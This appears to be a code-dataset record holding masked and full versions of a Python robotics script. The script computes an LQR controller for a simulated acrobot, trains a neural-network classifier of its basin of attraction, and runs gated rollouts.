"step-1": "<mask token>\n\n\ndef control(q):\n gs = np.array([pi / 2, 0, 0, 0])\n return -k.dot(q - gs)\n\n\ndef reward_fn(s, a):\n reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])\n done = reward < 2\n return reward, done\n\n\ndef do_rollout(args):\n x, trial_num = args\n th1, th2, dth1, dth2 = x\n np.random.seed(trial_num)\n local_reward_hist = np.ones((env.num_steps, 1)) * -1\n obs = env.reset(init_vec=[th1, th2, dth1, dth2])\n for i in range(env.num_steps):\n actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque)\n obs, reward, done, _ = env.step(actions)\n local_reward_hist[i, :] = np.copy(reward)\n if done:\n break\n return local_reward_hist, i\n\n\n<mask token>\n\n\ndef reward_fn(s, a):\n reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])\n return reward, False\n\n\ndef do_rollout(trial_num):\n np.random.seed(trial_num)\n act_hold = 20\n hold_count = 0\n obs = env.reset()\n local_lqr = False\n actions = np.random.randn(1) * 3\n local_state_hist = np.zeros((env.num_steps, env.observation_space.shape[0])\n )\n local_reward_hist = np.zeros((env.num_steps, 1))\n local_gate_hist = np.zeros((env.num_steps, 1))\n local_action_hist = np.zeros((env.num_steps, 1))\n for i in range(env.num_steps):\n obs = np.array(obs, dtype=np.float32)\n if sig(net(obs)) > 0.85:\n actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque\n )\n local_lqr = True\n local_gate_hist[i] = 1\n else:\n local_gate_hist[i] = 0\n if hold_count == act_hold:\n actions = np.random.randn(1) * 3\n hold_count = 0\n hold_count += 1\n obs, reward, done, _ = env.step(actions)\n local_action_hist[i, :] = np.copy(actions)\n local_state_hist[i, :] = np.copy(obs)\n local_reward_hist[i, :] = np.copy(reward)\n return (local_action_hist, local_state_hist, local_reward_hist,\n local_gate_hist, local_lqr)\n\n\n<mask token>\n",
"step-2": "<mask token>\nassert np.linalg.matrix_rank(Ctr) == 4\n<mask token>\nprint(k)\n\n\ndef control(q):\n gs = np.array([pi / 2, 0, 0, 0])\n return -k.dot(q - gs)\n\n\ndef reward_fn(s, a):\n reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])\n done = reward < 2\n return reward, done\n\n\ndef do_rollout(args):\n x, trial_num = args\n th1, th2, dth1, dth2 = x\n np.random.seed(trial_num)\n local_reward_hist = np.ones((env.num_steps, 1)) * -1\n obs = env.reset(init_vec=[th1, th2, dth1, dth2])\n for i in range(env.num_steps):\n actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque)\n obs, reward, done, _ = env.step(actions)\n local_reward_hist[i, :] = np.copy(reward)\n if done:\n break\n return local_reward_hist, i\n\n\n<mask token>\nsamples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min -\n th1dot_max, th2dot_min - th2dot_max])\nsamples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])\n<mask token>\nfor i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(\n num_trials / 2))))):\n rews, steps = res\n reward_hist[i, :, :] = rews\n total_steps += steps\n X[i, :] = samples[i, :]\n Y[i] = sum(rews) > env.num_steps * 3 - 10\n<mask token>\nsamples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min -\n th1dot_max, th2dot_min - th2dot_max])\nsamples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])\n<mask token>\nfor i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(\n num_trials / 2), int(num_trials))))):\n rews, steps = res\n reward_hist[i, :, :] = rews\n total_steps += steps\n X[i + int(num_trials / 2), :] = samples[i, :]\n Y[i + int(num_trials / 2)] = sum(rews) > env.num_steps * 3 - 5\nprint(time.time() - start)\n<mask token>\nplt.close()\nplt.plot(loss_hist)\nplt.show()\n<mask token>\nfor i, j in product(range(n_th), range(n_th)):\n coords[j, i, :] = np.array([th1_vals[i], th2_vals[j], 0, 0])\n<mask token>\nprint(end - start)\n<mask 
token>\nax.set_title('Theta')\nax.set_xlabel('Th1')\nax.set_ylabel('Th2')\nax.axis([x.min(), x.max(), y.min(), y.max()])\nfig.colorbar(c, ax=ax)\nplt.show()\n<mask token>\nfor i, j in product(range(n_th), range(n_th)):\n coords[j, i, :] = np.array([pi / 2, 0, th1dot_vals[i], th2dot_vals[j]])\n<mask token>\nprint(end - start)\n<mask token>\nax.set_title('DTheta')\nax.set_xlabel('dth1')\nax.set_ylabel('dth2')\nax.axis([x.min(), x.max(), y.min(), y.max()])\nfig.colorbar(c, ax=ax)\nplt.show()\ntorch.set_default_dtype(torch.float32)\n\n\ndef reward_fn(s, a):\n reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])\n return reward, False\n\n\ndef do_rollout(trial_num):\n np.random.seed(trial_num)\n act_hold = 20\n hold_count = 0\n obs = env.reset()\n local_lqr = False\n actions = np.random.randn(1) * 3\n local_state_hist = np.zeros((env.num_steps, env.observation_space.shape[0])\n )\n local_reward_hist = np.zeros((env.num_steps, 1))\n local_gate_hist = np.zeros((env.num_steps, 1))\n local_action_hist = np.zeros((env.num_steps, 1))\n for i in range(env.num_steps):\n obs = np.array(obs, dtype=np.float32)\n if sig(net(obs)) > 0.85:\n actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque\n )\n local_lqr = True\n local_gate_hist[i] = 1\n else:\n local_gate_hist[i] = 0\n if hold_count == act_hold:\n actions = np.random.randn(1) * 3\n hold_count = 0\n hold_count += 1\n obs, reward, done, _ = env.step(actions)\n local_action_hist[i, :] = np.copy(actions)\n local_state_hist[i, :] = np.copy(obs)\n local_reward_hist[i, :] = np.copy(reward)\n return (local_action_hist, local_state_hist, local_reward_hist,\n local_gate_hist, local_lqr)\n\n\n<mask token>\nfor i, res in enumerate(pool.imap(do_rollout, range(num_trials))):\n acts, obs, rews, gate, lqr_on = res\n action_hist[i, :, :] = acts\n state_hist[i, :, :] = obs\n reward_hist[i, :, :] = rews\n gate_hist[i, :, :] = gate\n err_hist[i] = np.sqrt(sum((state_hist[i, -1, :] - np.array([pi / 2, 0, \n 0, 0])) ** 2))\n if lqr_on:\n 
lqr_list.append(i)\n if err_hist[i] < 2:\n success_list.append(i)\nprint(len(lqr_list))\nprint(len(success_list))\nprint((time.time() - global_start) / 60)\n",
"step-3": "<mask token>\nglobal_start = time.time()\nm1 = 1\nm2 = 1\nl1 = 1\nl2 = 2\nlc1 = 0.5\nlc2 = 1\nI1 = 0.083\nI2 = 0.33\ng = 9.8\ndt = 0.01\nmax_torque = 25\nintegrator = euler\nQ = np.identity(4)\nQ[0, 0] = 1\nQ[1, 1] = 1\nQ[2, 2] = 1\nQ[3, 3] = 1\nR = np.identity(2) * 0.01\neval_max_t = 10\nth1 = pi / 2\nth2 = 0\nth1d = 0\nth2d = 0\nTAU = np.array([[0], [1]])\nm11 = m1 * lc1 ** 2 + m2 * (l1 ** 2 + lc2 ** 2 + 2 * l1 * lc2 * cos(th2)\n ) + I1 + I2\nm22 = m2 * lc2 ** 2 + I2\nm12 = m2 * (lc2 ** 2 + l1 * lc2 * cos(th2)) + I2\nM = np.array([[m11, m12], [m12, m22]])\nh1 = -m2 * l1 * lc2 * sin(th2) * th2d ** 2 - 2 * m2 * l1 * lc2 * sin(th2\n ) * th2d * th1d\nh2 = m2 * l1 * lc2 * sin(th2) * th1d ** 2\nH = np.array([[h1], [h2]])\nphi1 = (m1 * lc1 + m2 * l1) * g * cos(th1) + m2 * lc2 * g * cos(th1 + th2)\nphi2 = m2 * lc2 * g * cos(th1 + th2)\nPHI = np.array([[phi1], [phi2]])\nBl = np.linalg.inv(M) @ TAU\nBlin = np.array([[0, 0], [0, 0], [0, Bl[0].item()], [0, Bl[1].item()]])\nDPHI = np.array([[-g * (m1 * lc1 + m2 * l1 + m2 * lc2), -m2 * lc2 * g], [-\n m2 * lc2 * g, -m2 * lc2 * g]])\nAl = -np.linalg.inv(M) @ DPHI\nAlin = np.array([[0, 0, 1, 0], [0, 0, 0, 1], [Al[0, 0], Al[0, 1], 0, 0], [\n Al[1, 0], Al[1, 1], 0, 0]])\nCtr = ctrb(Alin, Blin)\nassert np.linalg.matrix_rank(Ctr) == 4\nK, S, E = lqr(Alin, Blin, Q, R)\nk = np.array(K[1, :])\nprint(k)\n\n\ndef control(q):\n gs = np.array([pi / 2, 0, 0, 0])\n return -k.dot(q - gs)\n\n\ndef reward_fn(s, a):\n reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])\n done = reward < 2\n return reward, done\n\n\ndef do_rollout(args):\n x, trial_num = args\n th1, th2, dth1, dth2 = x\n np.random.seed(trial_num)\n local_reward_hist = np.ones((env.num_steps, 1)) * -1\n obs = env.reset(init_vec=[th1, th2, dth1, dth2])\n for i in range(env.num_steps):\n actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque)\n obs, reward, done, _ = env.step(actions)\n local_reward_hist[i, :] = np.copy(reward)\n if done:\n break\n return 
local_reward_hist, i\n\n\nstart = time.time()\nconfig = {'init_state': [0, 0, 0, 0], 'max_torque': max_torque,\n 'init_state_weights': [0, 0, 0, 0], 'max_t': 2.5, 'dt': dt, 'm2': m2,\n 'm1': m1, 'l1': l1, 'lc1': lc1, 'lc2': lc2, 'i1': I1, 'i2': I2,\n 'integrator': integrator, 'reward_fn': reward_fn, 'act_hold': 1}\nenv = gym.make('su_acrobot-v0', **config)\nnum_trials = 200000\nreward_hist = np.zeros((num_trials, env.num_steps, 1))\nX = np.zeros((num_trials, 4), dtype=np.float32)\nY = np.zeros((num_trials, 1), dtype=np.float32)\nth1_min = pi / 2 - 0.5\nth1_max = pi / 2 + 0.5\nth2_min = -1\nth2_max = 1\nth1dot_min = -5\nth1dot_max = 5\nth2dot_min = -10\nth2dot_max = 10\nsamples = np.random.random_sample((int(num_trials / 2), 4))\nsamples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min -\n th1dot_max, th2dot_min - th2dot_max])\nsamples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])\ntotal_steps = 0\npool = Pool()\nfor i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(\n num_trials / 2))))):\n rews, steps = res\n reward_hist[i, :, :] = rews\n total_steps += steps\n X[i, :] = samples[i, :]\n Y[i] = sum(rews) > env.num_steps * 3 - 10\nth1_min = 0\nth1_max = 2 * pi\nth2_min = -pi\nth2_max = pi\nth1dot_min = -10\nth1dot_max = 10\nth2dot_min = -30\nth2dot_max = 30\nsamples = np.random.random_sample((int(num_trials / 2), 4))\nsamples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min -\n th1dot_max, th2dot_min - th2dot_max])\nsamples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])\ntotal_steps = 0\nfor i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(\n num_trials / 2), int(num_trials))))):\n rews, steps = res\n reward_hist[i, :, :] = rews\n total_steps += steps\n X[i + int(num_trials / 2), :] = samples[i, :]\n Y[i + int(num_trials / 2)] = sum(rews) > env.num_steps * 3 - 5\nprint(time.time() - start)\n<mask token>\nnet = MLP(4, 1, 2, 32)\nY0 = np.ones((num_trials, 1), dtype=np.float32)\nw = 
0.01\nclass_weight = torch.tensor(Y.shape[0] / sum(Y) * w, dtype=torch.float32)\nloss_hist = fit_model(net, X, Y, 50, batch_size=2048, loss_fn=torch.nn.\n BCEWithLogitsLoss(pos_weight=class_weight))\nplt.close()\nplt.plot(loss_hist)\nplt.show()\nn_thdot = 1\nn_th = 1000\nth1_vals = np.linspace(0, 2 * pi, n_th)\nth2_vals = np.linspace(-pi, pi, n_th)\nth1dot_vals = np.linspace(-10, 10, n_th)\nth2dot_vals = np.linspace(-30, 30, n_th)\nsig = torch.nn.Sigmoid()\ncoords = np.zeros((n_th, n_th, 4), dtype=np.float32)\n<mask token>\nstart = time.time()\nfor i, j in product(range(n_th), range(n_th)):\n coords[j, i, :] = np.array([th1_vals[i], th2_vals[j], 0, 0])\npreds = sig(net(coords.reshape(-1, 4)).reshape(n_th, n_th).detach())\nend = time.time()\nprint(end - start)\nfig, ax = plt.subplots(n_thdot, n_thdot, figsize=(8, 8))\nx, y = np.meshgrid(th1_vals, th2_vals)\nz = preds\nz = z[:-1, :-1]\nz_min, z_max = 0, np.abs(z).max()\nc = ax.pcolormesh(x, y, z, cmap='RdBu', vmin=z_min, vmax=z_max)\nax.set_title('Theta')\nax.set_xlabel('Th1')\nax.set_ylabel('Th2')\nax.axis([x.min(), x.max(), y.min(), y.max()])\nfig.colorbar(c, ax=ax)\nplt.show()\ncoords = np.zeros((n_th, n_th, 4), dtype=np.float32)\nstart = time.time()\nfor i, j in product(range(n_th), range(n_th)):\n coords[j, i, :] = np.array([pi / 2, 0, th1dot_vals[i], th2dot_vals[j]])\npreds = sig(net(coords.reshape(-1, 4)).reshape(n_th, n_th).detach())\nend = time.time()\nprint(end - start)\nfig, ax = plt.subplots(n_thdot, n_thdot, figsize=(8, 8))\nx, y = np.meshgrid(th1dot_vals, th2dot_vals)\nz = preds\nz = z[:-1, :-1]\nz_min, z_max = 0, np.abs(z).max()\nc = ax.pcolormesh(x, y, z, cmap='RdBu', vmin=z_min, vmax=z_max)\nax.set_title('DTheta')\nax.set_xlabel('dth1')\nax.set_ylabel('dth2')\nax.axis([x.min(), x.max(), y.min(), y.max()])\nfig.colorbar(c, ax=ax)\nplt.show()\ntorch.set_default_dtype(torch.float32)\n\n\ndef reward_fn(s, a):\n reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])\n return reward, False\n\n\ndef 
do_rollout(trial_num):\n np.random.seed(trial_num)\n act_hold = 20\n hold_count = 0\n obs = env.reset()\n local_lqr = False\n actions = np.random.randn(1) * 3\n local_state_hist = np.zeros((env.num_steps, env.observation_space.shape[0])\n )\n local_reward_hist = np.zeros((env.num_steps, 1))\n local_gate_hist = np.zeros((env.num_steps, 1))\n local_action_hist = np.zeros((env.num_steps, 1))\n for i in range(env.num_steps):\n obs = np.array(obs, dtype=np.float32)\n if sig(net(obs)) > 0.85:\n actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque\n )\n local_lqr = True\n local_gate_hist[i] = 1\n else:\n local_gate_hist[i] = 0\n if hold_count == act_hold:\n actions = np.random.randn(1) * 3\n hold_count = 0\n hold_count += 1\n obs, reward, done, _ = env.step(actions)\n local_action_hist[i, :] = np.copy(actions)\n local_state_hist[i, :] = np.copy(obs)\n local_reward_hist[i, :] = np.copy(reward)\n return (local_action_hist, local_state_hist, local_reward_hist,\n local_gate_hist, local_lqr)\n\n\nconfig = {'init_state': [-pi / 2, 0, 0, 0], 'max_torque': max_torque,\n 'init_state_weights': [1, 1, 5, 5], 'dt': dt, 'm2': m2, 'm1': m1, 'l1':\n l1, 'lc1': lc1, 'lc2': lc2, 'i1': I1, 'i2': I2, 'integrator':\n integrator, 'reward_fn': reward_fn, 'act_hold': 1, 'max_t': 10}\nenv = gym.make('su_acrobot-v0', **config)\nnum_trials = 1000\naction_hist = np.zeros((num_trials, env.num_steps, 1))\nstate_hist = np.zeros((num_trials, env.num_steps, env.observation_space.\n shape[0]))\nreward_hist = np.zeros((num_trials, env.num_steps, 1))\ngate_hist = np.zeros((num_trials, env.num_steps, 1))\nerr_hist = np.zeros((num_trials, 1))\nlqr_list = []\nsuccess_list = []\nact_hold = 20\nhold_count = 0\nobs = env.reset()\nstart = time.time()\npool = Pool()\nfor i, res in enumerate(pool.imap(do_rollout, range(num_trials))):\n acts, obs, rews, gate, lqr_on = res\n action_hist[i, :, :] = acts\n state_hist[i, :, :] = obs\n reward_hist[i, :, :] = rews\n gate_hist[i, :, :] = gate\n err_hist[i] = 
np.sqrt(sum((state_hist[i, -1, :] - np.array([pi / 2, 0, \n 0, 0])) ** 2))\n if lqr_on:\n lqr_list.append(i)\n if err_hist[i] < 2:\n success_list.append(i)\nprint(len(lqr_list))\nprint(len(success_list))\nprint((time.time() - global_start) / 60)\n",
"step-4": "import numpy as np\nfrom numpy import sin, cos, pi\nimport gym\nimport seagul.envs\nfrom seagul.integration import rk4, euler\nfrom control import lqr, ctrb\nfrom torch.multiprocessing import Pool\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport time\nglobal_start = time.time()\nm1 = 1\nm2 = 1\nl1 = 1\nl2 = 2\nlc1 = 0.5\nlc2 = 1\nI1 = 0.083\nI2 = 0.33\ng = 9.8\ndt = 0.01\nmax_torque = 25\nintegrator = euler\nQ = np.identity(4)\nQ[0, 0] = 1\nQ[1, 1] = 1\nQ[2, 2] = 1\nQ[3, 3] = 1\nR = np.identity(2) * 0.01\neval_max_t = 10\nth1 = pi / 2\nth2 = 0\nth1d = 0\nth2d = 0\nTAU = np.array([[0], [1]])\nm11 = m1 * lc1 ** 2 + m2 * (l1 ** 2 + lc2 ** 2 + 2 * l1 * lc2 * cos(th2)\n ) + I1 + I2\nm22 = m2 * lc2 ** 2 + I2\nm12 = m2 * (lc2 ** 2 + l1 * lc2 * cos(th2)) + I2\nM = np.array([[m11, m12], [m12, m22]])\nh1 = -m2 * l1 * lc2 * sin(th2) * th2d ** 2 - 2 * m2 * l1 * lc2 * sin(th2\n ) * th2d * th1d\nh2 = m2 * l1 * lc2 * sin(th2) * th1d ** 2\nH = np.array([[h1], [h2]])\nphi1 = (m1 * lc1 + m2 * l1) * g * cos(th1) + m2 * lc2 * g * cos(th1 + th2)\nphi2 = m2 * lc2 * g * cos(th1 + th2)\nPHI = np.array([[phi1], [phi2]])\nBl = np.linalg.inv(M) @ TAU\nBlin = np.array([[0, 0], [0, 0], [0, Bl[0].item()], [0, Bl[1].item()]])\nDPHI = np.array([[-g * (m1 * lc1 + m2 * l1 + m2 * lc2), -m2 * lc2 * g], [-\n m2 * lc2 * g, -m2 * lc2 * g]])\nAl = -np.linalg.inv(M) @ DPHI\nAlin = np.array([[0, 0, 1, 0], [0, 0, 0, 1], [Al[0, 0], Al[0, 1], 0, 0], [\n Al[1, 0], Al[1, 1], 0, 0]])\nCtr = ctrb(Alin, Blin)\nassert np.linalg.matrix_rank(Ctr) == 4\nK, S, E = lqr(Alin, Blin, Q, R)\nk = np.array(K[1, :])\nprint(k)\n\n\ndef control(q):\n gs = np.array([pi / 2, 0, 0, 0])\n return -k.dot(q - gs)\n\n\ndef reward_fn(s, a):\n reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])\n done = reward < 2\n return reward, done\n\n\ndef do_rollout(args):\n x, trial_num = args\n th1, th2, dth1, dth2 = x\n np.random.seed(trial_num)\n local_reward_hist = np.ones((env.num_steps, 1)) * -1\n obs = 
env.reset(init_vec=[th1, th2, dth1, dth2])\n for i in range(env.num_steps):\n actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque)\n obs, reward, done, _ = env.step(actions)\n local_reward_hist[i, :] = np.copy(reward)\n if done:\n break\n return local_reward_hist, i\n\n\nstart = time.time()\nconfig = {'init_state': [0, 0, 0, 0], 'max_torque': max_torque,\n 'init_state_weights': [0, 0, 0, 0], 'max_t': 2.5, 'dt': dt, 'm2': m2,\n 'm1': m1, 'l1': l1, 'lc1': lc1, 'lc2': lc2, 'i1': I1, 'i2': I2,\n 'integrator': integrator, 'reward_fn': reward_fn, 'act_hold': 1}\nenv = gym.make('su_acrobot-v0', **config)\nnum_trials = 200000\nreward_hist = np.zeros((num_trials, env.num_steps, 1))\nX = np.zeros((num_trials, 4), dtype=np.float32)\nY = np.zeros((num_trials, 1), dtype=np.float32)\nth1_min = pi / 2 - 0.5\nth1_max = pi / 2 + 0.5\nth2_min = -1\nth2_max = 1\nth1dot_min = -5\nth1dot_max = 5\nth2dot_min = -10\nth2dot_max = 10\nsamples = np.random.random_sample((int(num_trials / 2), 4))\nsamples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min -\n th1dot_max, th2dot_min - th2dot_max])\nsamples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])\ntotal_steps = 0\npool = Pool()\nfor i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(\n num_trials / 2))))):\n rews, steps = res\n reward_hist[i, :, :] = rews\n total_steps += steps\n X[i, :] = samples[i, :]\n Y[i] = sum(rews) > env.num_steps * 3 - 10\nth1_min = 0\nth1_max = 2 * pi\nth2_min = -pi\nth2_max = pi\nth1dot_min = -10\nth1dot_max = 10\nth2dot_min = -30\nth2dot_max = 30\nsamples = np.random.random_sample((int(num_trials / 2), 4))\nsamples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min -\n th1dot_max, th2dot_min - th2dot_max])\nsamples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])\ntotal_steps = 0\nfor i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(\n num_trials / 2), int(num_trials))))):\n rews, steps = res\n reward_hist[i, :, :] = rews\n 
total_steps += steps\n X[i + int(num_trials / 2), :] = samples[i, :]\n Y[i + int(num_trials / 2)] = sum(rews) > env.num_steps * 3 - 5\nprint(time.time() - start)\nfrom seagul.nn import MLP, fit_model\nimport torch\nnet = MLP(4, 1, 2, 32)\nY0 = np.ones((num_trials, 1), dtype=np.float32)\nw = 0.01\nclass_weight = torch.tensor(Y.shape[0] / sum(Y) * w, dtype=torch.float32)\nloss_hist = fit_model(net, X, Y, 50, batch_size=2048, loss_fn=torch.nn.\n BCEWithLogitsLoss(pos_weight=class_weight))\nplt.close()\nplt.plot(loss_hist)\nplt.show()\nn_thdot = 1\nn_th = 1000\nth1_vals = np.linspace(0, 2 * pi, n_th)\nth2_vals = np.linspace(-pi, pi, n_th)\nth1dot_vals = np.linspace(-10, 10, n_th)\nth2dot_vals = np.linspace(-30, 30, n_th)\nsig = torch.nn.Sigmoid()\ncoords = np.zeros((n_th, n_th, 4), dtype=np.float32)\nfrom itertools import product\nstart = time.time()\nfor i, j in product(range(n_th), range(n_th)):\n coords[j, i, :] = np.array([th1_vals[i], th2_vals[j], 0, 0])\npreds = sig(net(coords.reshape(-1, 4)).reshape(n_th, n_th).detach())\nend = time.time()\nprint(end - start)\nfig, ax = plt.subplots(n_thdot, n_thdot, figsize=(8, 8))\nx, y = np.meshgrid(th1_vals, th2_vals)\nz = preds\nz = z[:-1, :-1]\nz_min, z_max = 0, np.abs(z).max()\nc = ax.pcolormesh(x, y, z, cmap='RdBu', vmin=z_min, vmax=z_max)\nax.set_title('Theta')\nax.set_xlabel('Th1')\nax.set_ylabel('Th2')\nax.axis([x.min(), x.max(), y.min(), y.max()])\nfig.colorbar(c, ax=ax)\nplt.show()\ncoords = np.zeros((n_th, n_th, 4), dtype=np.float32)\nstart = time.time()\nfor i, j in product(range(n_th), range(n_th)):\n coords[j, i, :] = np.array([pi / 2, 0, th1dot_vals[i], th2dot_vals[j]])\npreds = sig(net(coords.reshape(-1, 4)).reshape(n_th, n_th).detach())\nend = time.time()\nprint(end - start)\nfig, ax = plt.subplots(n_thdot, n_thdot, figsize=(8, 8))\nx, y = np.meshgrid(th1dot_vals, th2dot_vals)\nz = preds\nz = z[:-1, :-1]\nz_min, z_max = 0, np.abs(z).max()\nc = ax.pcolormesh(x, y, z, cmap='RdBu', vmin=z_min, 
vmax=z_max)\nax.set_title('DTheta')\nax.set_xlabel('dth1')\nax.set_ylabel('dth2')\nax.axis([x.min(), x.max(), y.min(), y.max()])\nfig.colorbar(c, ax=ax)\nplt.show()\ntorch.set_default_dtype(torch.float32)\n\n\ndef reward_fn(s, a):\n reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])\n return reward, False\n\n\ndef do_rollout(trial_num):\n np.random.seed(trial_num)\n act_hold = 20\n hold_count = 0\n obs = env.reset()\n local_lqr = False\n actions = np.random.randn(1) * 3\n local_state_hist = np.zeros((env.num_steps, env.observation_space.shape[0])\n )\n local_reward_hist = np.zeros((env.num_steps, 1))\n local_gate_hist = np.zeros((env.num_steps, 1))\n local_action_hist = np.zeros((env.num_steps, 1))\n for i in range(env.num_steps):\n obs = np.array(obs, dtype=np.float32)\n if sig(net(obs)) > 0.85:\n actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque\n )\n local_lqr = True\n local_gate_hist[i] = 1\n else:\n local_gate_hist[i] = 0\n if hold_count == act_hold:\n actions = np.random.randn(1) * 3\n hold_count = 0\n hold_count += 1\n obs, reward, done, _ = env.step(actions)\n local_action_hist[i, :] = np.copy(actions)\n local_state_hist[i, :] = np.copy(obs)\n local_reward_hist[i, :] = np.copy(reward)\n return (local_action_hist, local_state_hist, local_reward_hist,\n local_gate_hist, local_lqr)\n\n\nconfig = {'init_state': [-pi / 2, 0, 0, 0], 'max_torque': max_torque,\n 'init_state_weights': [1, 1, 5, 5], 'dt': dt, 'm2': m2, 'm1': m1, 'l1':\n l1, 'lc1': lc1, 'lc2': lc2, 'i1': I1, 'i2': I2, 'integrator':\n integrator, 'reward_fn': reward_fn, 'act_hold': 1, 'max_t': 10}\nenv = gym.make('su_acrobot-v0', **config)\nnum_trials = 1000\naction_hist = np.zeros((num_trials, env.num_steps, 1))\nstate_hist = np.zeros((num_trials, env.num_steps, env.observation_space.\n shape[0]))\nreward_hist = np.zeros((num_trials, env.num_steps, 1))\ngate_hist = np.zeros((num_trials, env.num_steps, 1))\nerr_hist = np.zeros((num_trials, 1))\nlqr_list = []\nsuccess_list = []\nact_hold 
= 20\nhold_count = 0\nobs = env.reset()\nstart = time.time()\npool = Pool()\nfor i, res in enumerate(pool.imap(do_rollout, range(num_trials))):\n acts, obs, rews, gate, lqr_on = res\n action_hist[i, :, :] = acts\n state_hist[i, :, :] = obs\n reward_hist[i, :, :] = rews\n gate_hist[i, :, :] = gate\n err_hist[i] = np.sqrt(sum((state_hist[i, -1, :] - np.array([pi / 2, 0, \n 0, 0])) ** 2))\n if lqr_on:\n lqr_list.append(i)\n if err_hist[i] < 2:\n success_list.append(i)\nprint(len(lqr_list))\nprint(len(success_list))\nprint((time.time() - global_start) / 60)\n",
"step-5": "# %%\nimport numpy as np\nfrom numpy import sin, cos, pi\nimport gym\nimport seagul.envs\n\nfrom seagul.integration import rk4,euler\nfrom control import lqr, ctrb\nfrom torch.multiprocessing import Pool\nimport matplotlib.pyplot as plt\nimport matplotlib\n\n#matplotlib.use('Qt5Agg')\n\nimport time\n\nglobal_start = time.time()\n\n# %%\nm1 = 1\nm2 = 1\nl1 = 1\nl2 = 2\nlc1 = .5\nlc2 = 1\nI1 = .083\nI2 = .33\ng = 9.8\n\n#\n# m1 = 1\n# m2 = 1\n# l1 = 1\n# l2 = 1\n# lc1 = .5\n# lc2 = .5\n# I1 = .2\n# I2 = 1.0\n# g = 9.8\n\n\ndt = .01\nmax_torque = 25\nintegrator = euler\n\nQ = np.identity(4)\nQ[0, 0] = 1\nQ[1, 1] = 1\nQ[2, 2] = 1\nQ[3, 3] = 1\n#\n# Q = np.array([[1000, -500, 0,0],[-500, 1000, 0, 0],[0, 0, 1000, -500],[0,0,-500,1000]])\nR = np.identity(2) * .01\n\neval_max_t = 10\n\n\nth1 = pi / 2\nth2 = 0\nth1d = 0\nth2d = 0\n\nTAU = np.array([[0], [1]])\n\nm11 = m1 * lc1 ** 2 + m2 * (l1 ** 2 + lc2 ** 2 + 2 * l1 * lc2 * cos(th2)) + I1 + I2\nm22 = m2 * lc2 ** 2 + I2\nm12 = m2 * (lc2 ** 2 + l1 * lc2 * cos(th2)) + I2\nM = np.array([[m11, m12], [m12, m22]])\n\nh1 = -m2 * l1 * lc2 * sin(th2) * th2d ** 2 - 2 * m2 * l1 * lc2 * sin(th2) * th2d * th1d\nh2 = m2 * l1 * lc2 * sin(th2) * th1d ** 2\nH = np.array([[h1], [h2]])\n\nphi1 = (m1 * lc1 + m2 * l1) * g * cos(th1) + m2 * lc2 * g * cos(th1 + th2)\nphi2 = m2 * lc2 * g * cos(th1 + th2)\nPHI = np.array([[phi1], [phi2]])\n\nBl = np.linalg.inv(M) @ TAU\nBlin = np.array([[0, 0], [0, 0], [0, Bl[0].item()], [0, Bl[1].item()]])\n\nDPHI = np.array([[-g * (m1 * lc1 + m2 * l1 + m2 * lc2), -m2 * lc2 * g], [-m2 * lc2 * g, -m2 * lc2 * g]])\nAl = -np.linalg.inv(M) @ DPHI\nAlin = np.array([[0, 0, 1, 0], [0, 0, 0, 1], [Al[0, 0], Al[0, 1], 0, 0], [Al[1, 0], Al[1, 1], 0, 0]])\n\nCtr = ctrb(Alin, Blin)\nassert np.linalg.matrix_rank(Ctr) == 4\n\nK, S, E = lqr(Alin, Blin, Q, R)\nk = np.array(K[1, :])\nprint(k)\n\n\ndef control(q):\n gs = np.array([pi / 2, 0, 0, 0])\n return -k.dot(q - gs)\n\n\ndef reward_fn(s, a):\n reward = np.sin(s[0]) 
+ 2 * np.sin(s[0] + s[1])\n done = reward < 2\n return reward, done\n\n\ndef do_rollout(args):\n x, trial_num = args\n th1, th2, dth1, dth2 = x\n np.random.seed(trial_num)\n local_reward_hist = np.ones((env.num_steps, 1)) * -1\n obs = env.reset(init_vec=[th1, th2, dth1, dth2])\n\n for i in range(env.num_steps):\n actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque)\n obs, reward, done, _ = env.step(actions)\n local_reward_hist[i, :] = np.copy(reward)\n if done:\n break\n\n return local_reward_hist, i\n\n\n# %%b\nstart = time.time()\nconfig = {\"init_state\": [0, 0, 0, 0],\n \"max_torque\": max_torque,\n \"init_state_weights\": [0, 0, 0, 0],\n \"max_t\" : 2.5,\n \"dt\": dt,\n \"m2\": m2,\n \"m1\": m1,\n \"l1\": l1,\n \"lc1\": lc1,\n \"lc2\": lc2,\n \"i1\": I1,\n \"i2\": I2,\n \"integrator\" : integrator,\n \"reward_fn\": reward_fn,\n \"act_hold\": 1\n }\nenv = gym.make('su_acrobot-v0', **config)\n\nnum_trials = 200000\nreward_hist = np.zeros((num_trials, env.num_steps, 1))\n\nX = 